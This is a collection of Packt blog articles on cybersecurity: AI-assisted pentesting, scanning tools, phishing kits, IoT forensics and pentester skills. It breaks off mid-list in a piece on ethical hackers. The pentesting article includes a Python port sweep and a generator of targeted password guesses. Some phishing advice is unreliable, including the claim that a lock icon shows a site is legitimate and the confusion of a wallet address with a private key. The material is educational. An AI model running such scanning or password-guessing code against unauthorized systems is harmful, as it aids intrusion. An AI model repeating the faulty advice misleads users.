It further speeds up incident investigations with actionable context about compromised devices and workloads over time, making it quick and easy to find all devices or workloads accessed by compromised accounts and to identify files involved in exfiltration. Just as diamond cuts diamond, AI cuts AI. With AI used on both sides, to attack and to defend, AI systems will learn different and newer patterns and surface unique deviations to security analysts, allowing organizations to stop an attack well before it reaches the core. Given the rate at which AI and machine learning are expanding, the days when AI will redefine the entire cybersecurity ecosystem are not that far off.

DeepMind AI can spot over 50 sight-threatening eye diseases with expert accuracy
IBM's DeepLocker: The Artificial Intelligence powered sneaky new breed of Malware
7 Black Hat USA 2018 conference cybersecurity training highlights
Top 5 cybersecurity trends you should be aware of in 2018


The evolution of cybercrime

Packt Editorial Staff
29 Mar 2018
4 min read
A history of cybercrime
As computer systems have become integral to the daily functioning of businesses, organizations, governments, and individuals, we have learned to put a tremendous amount of trust in them, and as a result we have placed incredibly important and valuable information on them. History has shown that things of value will always be a target for criminals, and cybercrime is no different. As people fill their personal computers, phones, and so on with valuable data, they put a target on that information for criminals who aim to gain some form of profit from it. In the past, in order for a criminal to gain access to an individual's valuables, they would have to conduct a robbery in some shape or form. In the case of data theft, the criminal would need to break into a building and sift through files looking for the information of greatest value and profit. In our modern world, the criminal can attack their victims from a distance, and due to the nature of the internet, these acts will most likely never meet retribution.

Cybercrime in the 70s and 80s
In the 70s, we saw criminals taking advantage of the tone system used on phone networks. The attack was called phreaking, and it involved reverse-engineering the tones used by the telephone companies to make long-distance calls. In 1988, the first computer worm made its debut on the internet and caused a great deal of destruction to organizations. This first worm was called the Morris worm, after its creator Robert Morris. While this worm was not originally intended to be malicious, it still caused a great deal of damage; the U.S. Government Accountability Office estimated that the damage could have been as high as $10,000,000. 1989 brought us the first known ransomware attack, which targeted the healthcare industry. Ransomware is a type of malicious software that locks a user's data until a small ransom is paid, which results in the issuance of a cryptographic unlock key. In this attack, an evolutionary biologist named Joseph Popp distributed 20,000 floppy disks across 90 countries, claiming the disks contained software that could be used to analyze an individual's risk factors for contracting the AIDS virus. The disks actually contained a malware program that, when executed, displayed a message requiring the user to pay for a software license. Ransomware attacks have evolved greatly over the years, with the healthcare field remaining a very large target.

The birth of the web and a new dawn for cybercrime
The 90s brought the web browser and email to the masses, which meant new tools for cybercriminals to exploit and a greatly expanded reach. Until this time, the cybercriminal needed to initiate a physical transaction, such as providing a floppy disk. Now cybercriminals could transmit virus code over the internet via these new, highly vulnerable web browsers. They took what they had learned previously and modified it to operate over the internet, with devastating results. Cybercriminals were also able to reach out and con people from a distance with phishing attacks. No longer was it necessary to engage with individuals directly: you could attempt to trick millions of users simultaneously, and even if only a small percentage of people took the bait, you stood to make a lot of money as a cybercriminal. The 2000s brought us social media and saw the rise of identity theft.
A bullseye was painted for cybercriminals with the creation of databases containing millions of users' personally identifiable information (PII), making identity theft the new financial piggy bank for criminal organizations around the world. This information, coupled with a lack of cybersecurity awareness among the general public, allowed cybercriminals to commit all types of financial fraud, such as opening bank accounts and credit cards in the names of others.

Cybercrime in a fast-paced technology landscape
Today we see that cybercriminal activity has only gotten worse. As computer systems have gotten faster and more complex, the cybercriminal has become more sophisticated and harder to catch. Today we have botnets: networks of private computers infected with malicious software that allow the criminal element to control millions of infected computer systems across the globe, overload organizational networks, and hide the origin of the criminals. As a result:

We see constant ransomware attacks across all sectors of the economy
People are constantly on the lookout for identity theft and financial fraud
There are continuous news reports regarding the latest point-of-sale attacks against major retailers and hospitality organizations

This is an extract from the Information Security Handbook by Darren Death. Follow Darren on Twitter: @DarrenDeath.

How artificial intelligence can improve pentesting

Melisha Dsouza
21 Oct 2018
8 min read
686 cybersecurity breaches were reported in the first three months of 2018 alone, with unauthorized intrusion accounting for 38.9% of incidents. And with high-profile data breaches dominating headlines, it's clear that while modern, complex software architecture might be more adaptable and data-intensive than ever, securing that software is proving a real challenge. Penetration testing (or pentesting) is a vital component of the cybersecurity toolkit, and in theory it should be at the forefront of any robust security strategy. But it isn't as simple as just rolling something out with a few emails and new software: it demands people with great skills, as well as a culture where stress-testing and hacking your own system is viewed as a necessity, not an optional extra. This is where artificial intelligence comes in. The automation that you can achieve through artificial intelligence could well make pentesting much easier to do consistently and at scale. In turn, this would help organizations tackle both the skills and the culture issues, and get serious about their cybersecurity strategies. But before we dive deeper into artificial intelligence and pentesting, let's take a look at where we are now, and at the shortcomings of established pentesting methods.

The shortcomings of established methods of pentesting
Typically, pentesting is carried out in five stages: reconnaissance, scanning, gaining access, maintaining access, and covering tracks (diagram source: Incapsula). Every one of these stages, when carried out by humans, opens up the chance of error. Yes, software is important, but contextual awareness and decisions are required, and this process provides plenty of opportunities for mistakes. From misinterpreting data, like thinking a system is secure when actually it isn't, to taking care of evidence and thoroughly and clearly recording the results of pentests, even the most experienced pentester will get things wrong. But even if you don't make any mistakes, this whole process is hard to do well at scale. It requires a significant amount of time and energy to test a piece of software, which, given the pace of change created by modern processes, makes it much harder to maintain the levels of rigor you ultimately want from pentesting. This is where artificial intelligence comes in.

The pentesting areas that artificial intelligence can impact
Let's dive into the different stages of pentesting that AI can impact.

#1 Reconnaissance stage
The most important stage in pentesting is the reconnaissance, or information gathering, stage. As is rightly said by many in cybersecurity, "the more information gathered, the higher the likelihood of success". Therefore, a significant amount of time should be spent obtaining as much information as possible about the target. Using AI to automate this stage would provide accurate results as well as save a lot of the time invested. Using a combination of natural language processing, computer vision, and artificial intelligence, experts can identify a wide variety of details that can be used to build a profile of the company, its employees, its security posture, and even the software and hardware components of the network and computers.

#2 Scanning stage
Comprehensive coverage is needed in the scanning phase. Manually scanning through thousands of systems in an organization is not ideal, and neither is manually interpreting the results returned by scanning tools. AI can be used to tweak the code of the scanning tools so that they scan systems and also interpret the results of the scans, saving pentesters time and improving the overall efficiency of the pentesting process. AI can take over test management and automatically create test cases that check whether a particular program can be tagged as having a security flaw, and it can be used to check how a target system responds to an intrusion.
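To give a feel for how little code basic scanning automation requires, here is a minimal concurrent TCP port sweep in Python (the target address is a placeholder; only scan hosts that are explicitly in scope for your engagement):

```python
import socket
from concurrent.futures import ThreadPoolExecutor

def probe(host, port, timeout=0.5):
    """Return the port number if a TCP connect succeeds, else None."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return port if s.connect_ex((host, port)) == 0 else None

host = "192.0.2.10"  # placeholder in-scope target
with ThreadPoolExecutor(max_workers=100) as pool:
    open_ports = [p for p in pool.map(lambda p: probe(host, p), range(1, 1025)) if p]

print(f"open ports on {host}: {open_ports}")
```

The interpretation step, deciding which of those open ports actually matters, is exactly the part this article argues AI can help with.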
#3 Gaining and maintaining access stage
The gaining access phase involves taking control of one or more network devices, either to extract data from the target or to use the device to launch attacks on other targets. Once a system has been scanned for vulnerabilities, the pentesters need to ensure that it has no loopholes that attackers can exploit to get into the network devices, and that the devices are safely protected with strong passwords and other necessary credentials. AI-based algorithms can try out different combinations of passwords to check whether the system is susceptible to a break-in, and they can be trained to observe user data and look for trends or patterns in order to make inferences about the passwords likely to be in use, as the sketch below illustrates. Maintaining access focuses on establishing other entry points to the target. This phase is also expected to trigger mechanisms that ensure the penetration tester's own security when accessing the network. AI-based algorithms should be run at regular intervals to guarantee that the primary path to the device is closed, and they should be able to discover backdoors, new administrator accounts, encrypted channels, new network access channels, and so on.
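A toy sketch of the pattern-based candidate generation mentioned above (the tokens are hypothetical values a reconnaissance pass might yield; a real system would learn these composition patterns from breach corpora rather than hard-coding them):

```python
import itertools

# Hypothetical tokens gathered during reconnaissance: company, username, pet
tokens = ["acme", "jsmith", "fluffy"]
years = ["2017", "2018"]
suffixes = ["", "!", "123"]

# Combine each token (plain and capitalized) with common year/suffix patterns
candidates = {
    "".join(parts)
    for word in tokens
    for parts in itertools.product((word, word.capitalize()), years, suffixes)
}

print(sorted(candidates)[:5], f"... {len(candidates)} candidates total")
```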
AI-based pentesting tools

Pentoma is an AI-powered penetration testing solution that allows software developers to conduct smart hacking attacks and efficiently pinpoint security vulnerabilities in web apps and servers. It identifies holes in web application security before hackers do, helping prevent potential security damage. Pentoma analyzes web-based applications and servers to find unknown security risks. With each hacking attempt, its machine learning algorithms incorporate new vulnerability discoveries, thus continuously improving and expanding threat detection capability.

Wallarm Security Testing is another AI-based testing tool that discovers network assets, scans for common vulnerabilities, and monitors application responses for abnormal patterns. It discovers application-specific vulnerabilities via Automated Threat Verification. The content of a blocked malicious request is used to create a sanitized test with the same attack vector, to see how the application, or its copy in a sandbox, would respond.

With such AI-based pentesting tools, pentesters can focus on the development process itself, confident that applications are secured against the latest hacking and reverse engineering attempts, thereby helping to streamline a product's time to market.

Perhaps it is the increase in the number of costly data breaches, or the continually expanding attack surface, or the proliferation of sensitive data guarded by increasingly complex security technologies that businesses lack the in-house expertise to properly manage. Whatever the reason, more organizations are waking up to the fact that vulnerabilities not caught in time can be catastrophic for the business. These weaknesses, which can range from poorly coded web applications to unpatched databases, exploitable passwords, and an uneducated user population, can enable sophisticated adversaries to run amok across your business. It will be interesting to see how AI grows in this field to overcome all the aforementioned shortcomings.

5 ways artificial intelligence is upgrading software engineering
Intelligent Edge Analytics: 7 ways machine learning is driving edge computing adoption in 2018
8 ways Artificial Intelligence can improve DevOps

Why did Uber create Hudi, an open source incremental processing framework on Apache Hadoop?

Bhagyashree R
19 Oct 2018
3 min read
In the process of rebuilding its Big Data platform, Uber created an open-source Spark library named Hadoop Upserts anD Incremental (Hudi). This library permits users to perform operations such as update, insert, and delete on existing Parquet data in Hadoop. It also allows data users to incrementally pull only the changed data, which significantly improves query efficiency. It is horizontally scalable, can be used from any Spark job, and, best of all, relies only on HDFS to operate.

Why was Hudi introduced?

Uber studied its current data content, data access patterns, and user-specific requirements to identify problem areas. This research revealed the following four limitations:

Scalability limitation in HDFS

Many companies that use HDFS to scale their Big Data infrastructure face this issue. Storing large numbers of small files can affect performance significantly, as HDFS is bottlenecked by its NameNode capacity. This becomes a major issue when the data size grows above 50-100 petabytes.

Need for faster data delivery in Hadoop

Since Uber operates in real time, there was a need to provide services with the latest data. It was important to make data delivery much faster, as the 24-hour data latency was way too slow for many of their use cases.

No direct support for updates and deletes for existing data

Uber used snapshot-based ingestion of data, meaning a fresh copy of source data was ingested every 24 hours. As Uber requires the latest data for its business, there was a need for a solution that supports update and delete operations on existing data. However, since their Big Data is stored in HDFS and Parquet, direct support for update operations on existing data was not available.

Faster ETL and modeling

ETL and modeling jobs were also snapshot-based, requiring the platform to rebuild derived tables in every run. ETL jobs also needed to become incremental to reduce data latency.

How does Hudi solve these limitations?

The following diagram shows Uber's Big Data platform after the incorporation of Hudi:

Source: Uber

Regardless of whether the data updates are new records added to recent date partitions or updates to older data, Hudi allows users to pass on their latest checkpoint timestamp and retrieve all the records that have been updated since, without running an expensive query that scans the entire source table. Using this library, Uber has moved from snapshot-based ingestion to an incremental ingestion model. As a result, data latency was reduced from 24 hours to less than one hour. To know about Hudi in detail, check out Uber's official announcement.
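Conceptually, the incremental pull described above looks something like the following PySpark sketch. This is a rough illustration rather than Uber's code: the exact option names vary across Hudi releases, the Hudi Spark bundle must be on the classpath, and the table path and checkpoint timestamp are hypothetical:

```python
# A minimal sketch of Hudi's incremental pull (assumptions noted above).
from pyspark.sql import SparkSession

spark = (SparkSession.builder
         .appName("hudi-incremental-pull")
         .getOrCreate())

table_path = "hdfs:///data/trips"   # hypothetical Hudi table location
begin_time = "20181019000000"       # last checkpoint timestamp

# Read only the records that changed after `begin_time`, instead of
# rescanning the whole table on every run.
updates = (spark.read.format("hudi")
           .option("hoodie.datasource.query.type", "incremental")
           .option("hoodie.datasource.read.begin.instanttime", begin_time)
           .load(table_path))

updates.show()
```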
How can Artificial Intelligence support your Big Data architecture?
Big data as a service (BDaaS) solutions: comparing IaaS, PaaS and SaaS
Uber's Marmaray, an Open Source Data Ingestion and Dispersal Framework for Apache Hadoop

Top 5 cybersecurity assessment tools for networking professionals

Savia Lobo
07 Jun 2018
6 min read
Security is one of the major concerns when setting up data centers in the cloud. Although most organizations deploy firewalls and managed networking components for their data centers, they still fear being attacked by intruders. As such, organizations constantly seek tools that can assist them in gauging how vulnerable their network is and how they can secure the applications within it.

Many confuse security assessment with penetration testing and use the terms interchangeably. However, there is a notable difference between the two. A security assessment is a process of finding the different vulnerabilities within a system and prioritizing them based on severity and business criticality. Penetration testing, on the other hand, simulates a real-life attack and maps out the paths a real attacker would take to carry it out. You can check out our article, Top 5 penetration testing tools for ethical hackers, to know about some of the pentesting tools.

A plethora of tools exists in the market, and every tool claims to be the best. Here is our top 5 list of tools to secure your organization over the network.

Wireshark

Wireshark is one of the most popular tools for packet analysis. It is open source under the GNU General Public License. Wireshark has a user-friendly GUI and also supports a command-line interface (CLI). It is a great debugging tool for developers who wish to build a network application, and it runs on multiple platforms including Windows, Linux, Solaris, and NetBSD. The Wireshark community also hosts SharkFest, launched in 2008, for Wireshark developers and the user communities. The main aim of this conference is to support Wireshark development and to educate current and future generations of computer science and IT professionals on how to use this tool to manage, troubleshoot, diagnose, and secure traditional and modern networks.

Some benefits of using this tool include:

Wireshark features live real-time traffic analysis and also supports offline analysis. Depending on the platform, one can read live data from Ethernet, PPP/HDLC, USB, IEEE 802.11, Token Ring, and many others.
Decryption support for several protocols such as IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2.
Network traffic captured by this tool can be browsed via a GUI or via the TTY-mode TShark utility.
Wireshark also has the most powerful display filters in the whole industry.
It also provides users with TShark, a network protocol analyzer used to analyze packets from hosts without a UI.

Nmap

Network Mapper, popularly known as Nmap, is an open source licensed tool for conducting network discovery and security auditing. It is also used for tasks such as network inventory management, monitoring host or service uptime, and much more. Nmap uses raw IP packets to find out the available hosts on the network, the services they offer, the OS they are running, the firewall they are currently using, and much more. Nmap is essential for quickly scanning large networks and can also be used to scan single hosts. It runs on all major operating systems and provides official binary packages for Windows, Linux, and Mac OS X. It also includes:

Zenmap - an advanced security scanner GUI and results viewer
Ncat - a tool used for data transfer, redirection, and debugging
Ndiff - a utility for comparing scan results
Nping - a packet generation and response analysis tool

Nmap is traditionally a command-line tool run from a Unix shell or Windows command prompt; a minimal automation sketch follows.
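The sketch below is an illustration, not an official Nmap utility: it drives an installed nmap binary from Python via subprocess and parses the XML output. scanme.nmap.org is Nmap's sanctioned test target; scan only hosts you are authorized to scan.

```python
# Drive nmap and parse its XML output (-sV: service/version detection,
# -oX -: write XML to stdout). Requires the nmap binary on the PATH.
import subprocess
import xml.etree.ElementTree as ET

def scan(target):
    """Run a service scan and return (port, service) pairs for open ports."""
    xml_out = subprocess.run(
        ["nmap", "-sV", "-oX", "-", target],
        capture_output=True, text=True, check=True,
    ).stdout
    root = ET.fromstring(xml_out)
    results = []
    for port in root.iter("port"):
        state = port.find("state")
        service = port.find("service")
        if state is not None and state.get("state") == "open":
            name = service.get("name") if service is not None else "unknown"
            results.append((port.get("portid"), name))
    return results

if __name__ == "__main__":
    print(scan("scanme.nmap.org"))  # Nmap's sanctioned test host
```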
This command-line design makes Nmap easy to script and allows easy sharing of useful commands within the user community. With this, experts do not have to move through different configuration panels and scattered option fields.

Nessus

Nessus, a product of Tenable, is one of the most popular vulnerability scanners, particularly for UNIX systems. The tool is constantly updated and offers more than 70,000 plugins. Nessus is available in both free and paid versions. The paid version costs around $2,190 per year, whereas the free version, Nessus Home, offers limited usage and is licensed only for home network use. Customers choose Nessus because:

It includes simple steps for policy creation and needs just a few clicks to scan an entire corporate network.
It offers vulnerability scanning at a low total cost of ownership (TCO).
One can carry out quick and accurate scans with fewer false positives.
It also has an embedded scripting language for users to write their own plugins and to understand the existing ones.

QualysGuard

QualysGuard is a well-known SaaS (Software-as-a-Service) vulnerability management tool. It has a comprehensive vulnerability knowledge base, using which it is able to provide continuous protection against the latest worms and security threats. It proactively monitors all the network access points, so security managers can spend less time researching, scanning, and fixing network vulnerabilities. This helps organizations avoid network vulnerabilities before they can be exploited. It provides a detailed technical analysis of threats via powerful, easy-to-read reports. A detailed report includes the security threat, the consequences faced if the vulnerability is exploited, and a recommended solution that explains how the vulnerability can be fixed. One can get a summary of the overall security posture with QualysGuard's executive dashboard, which displays the number of new, active, and re-opened vulnerabilities, along with a graph of vulnerabilities by severity level. Get to know more about QualysGuard on its official website.

Core Impact

Core Impact is widely used as a comprehensive tool to assess and test security vulnerabilities within any organization. It includes a large database of professional exploits and is regularly updated. It assists in cleanly exploiting one machine and then creating an encrypted tunnel through it to exploit other machines. Core Impact provides a controlled environment in which to mimic real attacks, helping one secure the network before an actual attack occurs. One interesting feature of Core Impact is that one can fully test the network, irrespective of its size, quickly and efficiently.

These are five popular tools network security professionals use for assessing their networks. However, there are many other tools, such as Netsparker, OpenVAS, and Nikto, for assessing network security. Every security assessment tool is unique in its own way; ultimately, it all boils down to one's own expertise and experience, and the kind of project environment it is used in.

Top 5 penetration testing tools for ethical hackers
Intel's Spectre variant 4 patch impacts CPU performance
Pentest tool in focus: Metasploit

Dark Web Phishing Kits: Cheap, plentiful and ready to trick you

Guest Contributor
07 Dec 2018
6 min read
Spam email is a part of daily life on the internet. Even the best junk mail filters will still let through certain suspicious-looking messages. If an illegitimate email tries to persuade you to click a link and enter personal information, then it is classified as a phishing attack.

Phishing attackers send out email blasts to large groups of people, with messages designed to look like they come from a reputable company, such as Google, Apple, or a banking or credit card firm. The emails will typically try to warn you about an error with your account and then urge you to click a link and log in with your credentials. Doing so brings you to an imitation website where the attacker will attempt to steal your password, social security number, or other private data.

These days phishing attacks are becoming more widespread. One of the primary reasons is easy access to cybercrime kits on the dark web. With the hacker community growing, internet users need to take privacy seriously and remain vigilant against spam and other threats. Read on to learn more about this trend and how to protect yourself.

Dark Web Basics

The dark web, often conflated with the deep web, operates as a separate environment on the internet. Normal web browsers, like Google Chrome or Mozilla Firefox, connect to the world wide web using the HTTP protocol. The dark web requires a special browser tool known as the Tor browser, which is fully encrypted and anonymous.

Image courtesy of Medium.com

Sites on the dark web cannot be indexed by search engines, so you'll never stumble on that content through Google. When you connect through the Tor browser, all of your browsing traffic is sent through a global overlay network so that your location and identity cannot be tracked. Even IP addresses are masked on the dark web.

Hacker Markets

Much of what takes place in this cyber underworld is illegal or unethical in nature, and that includes the marketplaces that exist there. Think of these sites as black-market versions of eBay, where anonymous individuals can buy and sell illegal goods and services. Recently, dark web markets have seen a surge in demand for cybercrime tools and utilities. Entire phishing kits are sold to buyers, including spoofed pages that imitate real companies and full guides on how to launch an email phishing scam.

Image courtesy of Medium.com

When a spam email is sent out as part of a phishing scam, the messages are typically delivered through dark web servers that make them hard for junk filters to identify. In addition, the "From" address in the emails may look legitimate and use a valid domain like @gmail.com. Phishing kits can be found for as little as two dollars, meaning that inexperienced hackers can launch a cybercrime effort with little funding or training. It's interesting to note that personal data prices at the dark web supermarket range from a single dollar (Social Security card) to thousands (medical records).
Cryptocurrency Scandal

You should be on the lookout for phishing scandals related to any company or industry, but banking and financial attacks in particular can be the most dangerous. If a hacker gains access to your credit card numbers or online banking password, they can commit fraud or even steal your identity. The growing popularity of cryptocurrencies like Bitcoin and Ether has revolutionized the financial industry but, as a negative side effect of the trend, cybercriminals are now targeting these digital money systems.

The MyEtherWallet website, which allows users to store blockchain currency in a central location, has been the victim of a number of phishing scams in recent months.

Image courtesy of MyEtherWallet.com

Because cryptocurrencies do not operate with a central bank or financial authority, you may not know what a legitimate email alert for one looks like. Phishing messages for MyEtherWallet will usually claim that there is an issue with your cryptocurrency account, or sometimes even suggest that you have a payment pending that needs to be verified. Clicking the link in the phishing email will launch your web browser and navigate to a spoofed page that looks like it is part of myetherwallet.com. However, the page is actually hosted on the hacker's network and feeds directly into their illegitimate database. If you enter your private wallet address, which is a unique string of letters and numbers, the hacker can gain access to all of the funds in your account.

Preventative Measures

Phishing attacks are a type of cybercrime that targets individuals, so it's up to you to be on guard for these messages and react appropriately. The first line of defense against phishing is to be skeptical of all emails that enter your inbox. Dark web hackers are getting better and better at imitating real companies with their spam and spoofed pages, so you need to look closely when examining the content. Always check the full URL of the links in email messages before you click one.

If you do get tricked and end up navigating to a spoofed page in your web browser, you still have a chance to protect yourself. All browsers support secure sockets layer (SSL) functionality and will display a lock icon or a green status bar at the top of the window when a website has been confirmed as legitimate. If you navigate to a webpage from an email that does not have a valid SSL certificate, you should close the browser immediately and permanently delete the email message.

The Bottom Line

Keep this in mind: as prices for phishing kits drop and supply increases, the allure of engaging in this kind of bad behavior will be too much to resist for an increasing number of people. Expect incidents of phishing to increase. The general internet-browsing public should stay on high alert at all times when navigating their email inbox. Think first, then click.

Author Bio

Gary Stevens is a front-end developer. He's a full-time blockchain geek and a volunteer working for the Ethereum foundation as well as an active Github contributor.

Packt has put together a new cybersecurity bundle for Humble Bundle
Malicious code in npm 'event-stream' package targets a bitcoin wallet and causes 8 million downloads in two months
Why scepticism is important in computer security: Watch James Mickens at USENIX 2018 argue for thinking over blindly shipping code

IoT Forensics: Security in an always connected world where things talk

Vijin Boricha
01 May 2018
3 min read
Connected physical devices, home automation appliances, and wearable devices are all part of the Internet of Things (IoT). All of these have two major things in common: seamless connectivity and massive data transfer. This also brings with it plenty of opportunities for massive data breaches and allied cyber security threats.

The purpose of digital forensics is to identify, collect, analyse, and present digital evidence collected from various mediums in a cybercrime incident. The multiplication of IoT devices and the increased number of cyber security incidents has given birth to IoT forensics, a branch of digital forensics that deals with IoT-related cybercrimes and includes the investigation of connected devices, sensors, and the data stored on all possible platforms. If you look at the bigger picture, IoT forensics is a lot more complex, multifaceted, and multidisciplinary in approach than traditional forensics.

With such a variety of IoT devices, there is no single method of IoT forensics that can be broadly applied, so identifying valuable sources of evidence is a major challenge. The entire investigation will depend on the nature of the connected or smart device in place. For example, evidence could be collected from fixed home automation sensors, moving automobile sensors, wearable devices, or data stored in the cloud.

Compared to standard digital forensic techniques, IoT forensics poses multiple challenges depending on the versatility and complexity of the devices involved. These include:

Variance of the IoT devices
Proprietary hardware and software
Data present across multiple devices and platforms
Data that can be updated, modified, or lost
Proprietary jurisdictions for data stored on the cloud or in a different geography

As such, IoT forensics requires a multi-faceted approach where evidence can be collected from various sources. We can categorize sources of evidence into three broad groups:

Smart devices and sensors: gadgets present at the crime scene (smartwatches, home automation appliances, weather control devices, and more)
Hardware and software: the communication link between smart devices and the external world (computers, mobile devices, IPS, and firewalls)
External resources: areas outside the network under investigation (cloud, social networks, ISPs, and mobile network providers)

Once the evidence is successfully collected from an IoT device, no matter the file system, operating system, or platform it is based on, it should be logged and monitored. The main reason is that IoT device data is mostly stored in the cloud, due to its scalability and accessibility, and there is a high possibility that data on the cloud can be altered, which would result in an investigation failure. Cloud forensics can certainly play an important role here, but strengthening cyber security best practices should be the primary goal.

With ever-evolving IoT devices, there will always be a need for unique practice methods and techniques to see an investigation through. Cybercrime keeps evolving and getting bolder by the day, and forensics experts will have to develop skill sets to deal with the variety and complexity of IoT devices to keep up with this evolution. No matter the challenges one faces, there is always a unique solution to complex problems. There will always be a need for unique, intelligent, and adaptable techniques to investigate IoT-related crimes, and an even greater need for those displaying these capabilities.
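As a concrete illustration of the evidence logging described above, one common tamper-evidence technique is to hash each collected artifact at acquisition time and record the digest alongside a timestamp. The sketch below is a minimal illustration; file paths are hypothetical, and real investigations follow formal chain-of-custody procedures:

```python
# Hash each collected artifact and append the digest to an evidence log,
# so later alteration of the evidence can be detected by re-hashing.
import hashlib
import json
from datetime import datetime, timezone
from pathlib import Path

def log_evidence(artifact: Path, log_file: Path) -> dict:
    digest = hashlib.sha256(artifact.read_bytes()).hexdigest()
    entry = {
        "artifact": str(artifact),
        "sha256": digest,
        "acquired_at": datetime.now(timezone.utc).isoformat(),
    }
    with log_file.open("a") as f:
        f.write(json.dumps(entry) + "\n")
    return entry

# Usage (hypothetical paths): re-hash the artifact later and compare
# against the logged digest to detect any alteration.
print(log_evidence(Path("sensor_dump.bin"), Path("evidence_log.jsonl")))
```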
To learn more about IoT security, you can get your hands on a few of our books: IoT Penetration Testing Cookbook and Practical Internet of Things Security.

Why Metadata is so important for IoT
Why the Industrial Internet of Things (IIoT) needs Architects
5 reasons to choose AWS IoT Core for your next IoT project

Essential skills for penetration testing

Hari Vignesh
11 Jun 2017
6 min read
Cybercriminals are continually developing new and more sophisticated ways to exploit software vulnerabilities, making it increasingly difficult to defend our systems. Today, then, we need to be proactive in how we protect our digital properties. That's why penetration testers are so in demand. Although risk analysis can easily be done by internal security teams, support from skilled penetration testers can be the difference between security and vulnerability.

These highly trained professionals can "think like the enemy" and employ creative ways to identify problems before they occur, going beyond the use of automated tools. Pentesters can perform technological offensives, but also simulate spear phishing campaigns to identify weak links in a company's security posture and pinpoint training needs. The human element is essential to simulate a realistic attack and uncover all of the infrastructure's critical weaknesses.

Being a pen tester can be financially rewarding because trained and skilled professionals can normally secure good wages. Employers are willing to pay top dollar to attract and retain talent, and most pen testers enjoy sizable salaries depending on where they live and their level of experience and training. According to a PayScale salary survey, the average salary is approximately $78K annually, ranging from $44K to $124K on the higher end.

To be a better pen tester, you need to master your art in certain aspects. The following skills will make you stand out in the crowd and make you a better, more effective pen tester. I know what you're thinking: this seems like an awful lot of work, right? Wrong. You can still learn how to penetration test and become a penetration tester without these things, but learning all of them will make the work easier and help you understand both how and why things are done a certain way. Bad pen testers know that things are vulnerable. Good pen testers know how things are vulnerable. Great pen testers know why things are vulnerable.

Mastering the command line

Notice that even in modern hacker films and series, the hackers always have a little black box on the screen with text going everywhere. It's a cliché, but it's based in reality. Hackers and penetration testers alike use the command line a lot, and most of the tools are command-line based. It's not showing off; it's just the most efficient way to do the job. If you want to become a penetration tester, you need to be, at the very least, comfortable with a DOS or PowerShell prompt or a terminal. The best way to develop this sort of skillset is to learn how to write DOS Batch or PowerShell scripts. There are various command-line tools that make the life of a pen tester easy, so learning and mastering those tools will enable you to pentest your environment efficiently.

Mastering OS concepts

If you look at penetration testing or hacking sites and tutorials, there's a strong tendency to use Linux. If you start with something like Ubuntu, Mint, Fedora, or Kali as a main OS and spend some time tinkering under the hood, it'll help you become more familiar with the environment. Setting up a VM to install and break into a Linux server is a great way to learn; as a small example, the sketch below flags world-writable files, one classic file permission weakness.
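This is a minimal illustration, not a complete audit tool, and assumes a Linux system with Python 3 available:

```python
# Walk a directory tree and flag world-writable regular files, a classic
# Linux file-permission weakness (any user can modify these files).
import os
import stat

def world_writable(root="/etc"):
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue  # unreadable entries are skipped, not fatal
            # stat.S_IWOTH is the "write" permission bit for "others"
            if stat.S_ISREG(mode) and mode & stat.S_IWOTH:
                findings.append(path)
    return findings

if __name__ == "__main__":
    for f in world_writable():
        print("world-writable:", f)
```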
You wouldn't expect to be able to comfortably find and exploit file permission weaknesses if you don't understand how Linux file permissions work, nor should you expect to exploit the latest vulnerabilities comfortably and effectively without understanding how they affect a system. A basic understanding of Unix file permissions, processes, shell scripting, and sockets will go a long way.

Mastering networking and protocols down to the packet level

TCP/IP seems really scary at first, but the basics can be learned in a day or two. You can use a packet sniffing tool called Wireshark to see what's really going on when you send traffic to a target, instead of blindly accepting documented behavior without understanding what's happening. You'll also need to know not only how HTTP works over the wire, but also understand the Document Object Model (DOM) and enough about how backends work to see how web-based vulnerabilities occur. You can become a penetration tester without learning a huge volume of things, but you'll struggle and it'll be a much less rewarding career.

Mastering programming

If you can't program, then you're at risk of losing out to candidates who can. At best, you're possibly going to lose money from that starting salary. Why? You need sufficient knowledge of a programming language to understand source code and find vulnerabilities in it. For instance, only if you know PHP and how it interacts with a database will you be able to exploit SQL injection. Your prospective employer is going to need to give you time to learn these things if they're going to get the most out of you. So don't steal money from your own career: learn to program. It's not hard. Being able to program means you can write tools, automate activities, and be far more efficient.

Aside from basic scripting, you should ideally become at least semi-comfortable with one programming language and cover the basics in another. Web people like Ruby. Python is popular amongst reverse engineers. Perl is particularly popular amongst hardcore Unix users. You don't need to be a great programmer, but being able to program is worth its weight in gold, and most languages have online tutorials to get you started.

Final thoughts

Employers will hire a bad junior tester if they have to, and a good junior tester if there's no one better, but they'll usually hire a potentially great junior pen tester in a heartbeat. If you don't spend time learning the basics to make yourself a great pen tester, you're stealing from your own potential salary. If you're missing some or all of the things above, don't be upset. You can still work towards getting a job in penetration testing, and you don't need to be an expert in any of these things. They're simply technical qualities that make you a much better (and probably better paid) candidate from a hiring manager's and supporting interviewer's perspective.

About the author

Hari Vignesh Jayapalan is a Google Certified Android app developer, IDF Certified UI & UX Professional, street magician, fitness freak, technology enthusiast, and wannabe entrepreneur. He can be found on Twitter @HariofSpades.

10 times ethical hackers spotted a software vulnerability and averted a crisis

Savia Lobo
30 Sep 2019
12 min read
A rise in cyber-attacks, and a lack of the knowledge and defenses to tackle them, has made it extremely important for companies to use ethical hacking to combat hackers. While black hat hackers use their skills for malicious purposes, to defraud high-profile companies or personalities, ethical hackers or white hat hackers use the same techniques (penetration testing, different password cracking methods, or social engineering) to break into a company's cyber defenses, but to help the company fix these vulnerabilities and loose ends and strengthen its systems. Ethical hackers are employed directly by a company's CTO or management, with a certain level of secrecy and without the knowledge of the staff or other cybersecurity teams. Ethical hacking can also be crowdsourced through bug bounty programs (BBP) and via responsible disclosure (RD).

There are multiple examples in just the past couple of years where ethical hackers have come to the rescue of software firms to avert a crisis that would have potentially incurred huge losses and put product users in harm's way.

10 instances where ethical hackers saved the day for companies with software vulnerabilities

1. An ethical hacker accessed Homebrew's GitHub repo in under 30 minutes

